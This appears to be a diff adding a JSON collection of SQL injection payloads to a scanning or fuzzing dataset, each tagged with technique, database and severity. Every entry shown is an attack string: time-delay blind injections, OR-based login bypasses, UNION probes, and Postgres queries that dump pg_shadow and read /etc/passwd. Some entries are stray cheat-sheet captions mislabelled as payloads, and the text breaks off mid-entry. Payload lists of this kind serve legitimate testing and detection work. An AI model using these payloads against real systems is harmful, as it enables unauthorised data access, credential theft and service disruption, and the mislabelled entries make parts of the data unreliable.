{ + "payload": "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "\"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-INSERT" + } + }, + { + "payload": "'", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "''", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "\"", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "\"\"", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": ";", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "' or \"", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "SQL-Injection" + } + }, + { + "payload": "' OR '' = '", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "SQL-Injection" + } + }, + { + "payload": "OR 1=1", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "SQL-Injection" + } + }, + { + "payload": "' OR 'x'='x", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "SQL-Injection" + } + }, + { + "payload": "' AND id IS NULL; --", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "'''''''''''''UNION SELECT '2", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "SQL-Injection" + } + }, + { + "payload": "+\t\taddition, concatenate (or space in url)", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "@@variable\tglobal variable", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "1' ORDER BY 1--+", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "1' ORDER BY 2--+", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "1' ORDER BY 3--+", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "1' ORDER BY 1,2--+", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "1' ORDER BY 1,2,3--+", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "1' GROUP BY 1,2,--+", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "1' GROUP BY 1,2,3--+", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "' GROUP BY columnnames having 1=1 --", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "SQL-Injection" + } + }, + { + "payload": "' UNION SELECT sum(columnname ) from tablename --", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "SQL-Injection" + } + }, + { + "payload": "1 AND (SELECT * FROM Users) = 1", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "' AND MID(VERSION(),1,1) = '5';", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "high", + "source": "SQL-Injection" + } + }, + { + "payload": "' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "Finding the table name", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": ",(select * from (select(sleep(10)))a)", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "%2c(select%20*%20from%20(select(sleep(10)))a)", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "';WAITFOR DELAY '0:0:30'--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": ";%00\tNullbyte", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL-Injection" + } + }, + { + "payload": "select version();", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "high", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "select current_database();", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "high", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "select current_user;", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "select session_user;", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "select current_setting('log_connections');", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "select current_setting('log_statement');", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "select current_setting('port');", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "select current_setting('password_encryption');", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "select current_setting('krb_server_keyfile');", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "select current_setting('virtual_host');", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "select current_setting('config_file');", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "select current_setting('hba_file');", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "select current_setting('data_directory');", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "select * from pg_shadow;", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "select * from pg_group;", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "create table myfile (input TEXT);", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "copy myfile from '/etc/passwd';", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "select * from myfile;copy myfile to /tmp/test;", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "postgresql", + "severity": "medium", + "source": "FUZZDB_Postgres_Enumeration" + } + }, + { + "payload": "sleep(5)#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "1 or sleep(5)#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "\" or sleep(5)#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "high", + "source": "Generic_TimeBased" + } + }, + { + "payload": "' or sleep(5)#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "high", + "source": "Generic_TimeBased" + } + }, + { + "payload": "\" or sleep(5)=\"", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "high", + "source": "Generic_TimeBased" + } + }, + { + "payload": "' or sleep(5)='", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "high", + "source": "Generic_TimeBased" + } + }, + { + "payload": "1) or sleep(5)#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "\") or sleep(5)=\"", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "') or sleep(5)='", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "1)) or sleep(5)#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "\")) or sleep(5)=\"", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "')) or sleep(5)='", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": ";waitfor delay '0:0:5'--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": ");waitfor delay '0:0:5'--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "';waitfor delay '0:0:5'--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "\";waitfor delay '0:0:5'--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "');waitfor delay '0:0:5'--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "\");waitfor delay '0:0:5'--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "));waitfor delay '0:0:5'--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "'));waitfor delay '0:0:5'--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "\"));waitfor delay '0:0:5'--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "benchmark(10000000,MD5(1))#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "1 or benchmark(10000000,MD5(1))#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "\" or benchmark(10000000,MD5(1))#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "high", + "source": "Generic_TimeBased" + } + }, + { + "payload": "' or benchmark(10000000,MD5(1))#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "high", + "source": "Generic_TimeBased" + } + }, + { + "payload": "1) or benchmark(10000000,MD5(1))#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "\") or benchmark(10000000,MD5(1))#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "') or benchmark(10000000,MD5(1))#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "1)) or benchmark(10000000,MD5(1))#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "\")) or benchmark(10000000,MD5(1))#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "')) or benchmark(10000000,MD5(1))#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "1 or pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "\" or pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "high", + "source": "Generic_TimeBased" + } + }, + { + "payload": "' or pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "high", + "source": "Generic_TimeBased" + } + }, + { + "payload": "1) or pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "\") or pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "') or pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "1)) or pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "\")) or pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "')) or pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "1||pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "\"||pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "'||pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "1)||pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "\")||pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "')||pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "1))||pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "\"))||pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "'))||pg_sleep(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "SLEEP(5)#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "SLEEP(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "SLEEP(5)=\"", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "SLEEP(5)='", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "or SLEEP(5)", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "or SLEEP(5)#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "or SLEEP(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "or SLEEP(5)=\"", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "or SLEEP(5)='", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "waitfor delay '00:00:05'", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "waitfor delay '00:00:05'--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "waitfor delay '00:00:05'#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "benchmark(50000000,MD5(1))", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "benchmark(50000000,MD5(1))--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "benchmark(50000000,MD5(1))#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "or benchmark(50000000,MD5(1))", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "or benchmark(50000000,MD5(1))--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "or benchmark(50000000,MD5(1))#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "pg_SLEEP(5)", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "pg_SLEEP(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "pg_SLEEP(5)#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "or pg_SLEEP(5)", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "or pg_SLEEP(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "or pg_SLEEP(5)#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "'\\\"", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "AnD SLEEP(5)", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "AnD SLEEP(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "AnD SLEEP(5)#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "&&SLEEP(5)", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "&&SLEEP(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "&&SLEEP(5)#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "' AnD SLEEP(5) ANd '1", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "'&&SLEEP(5)&&'1", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "ORDER BY SLEEP(5)", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "ORDER BY SLEEP(5)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "ORDER BY SLEEP(5)#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "(SELECT * FROM (SELECT(SLEEP(5)))ecMj)", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "+benchmark(3200,SHA1(1))+'", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "+ SLEEP(10) + '", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_TimeBased" + } + }, + { + "payload": "AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "generic", + "severity": 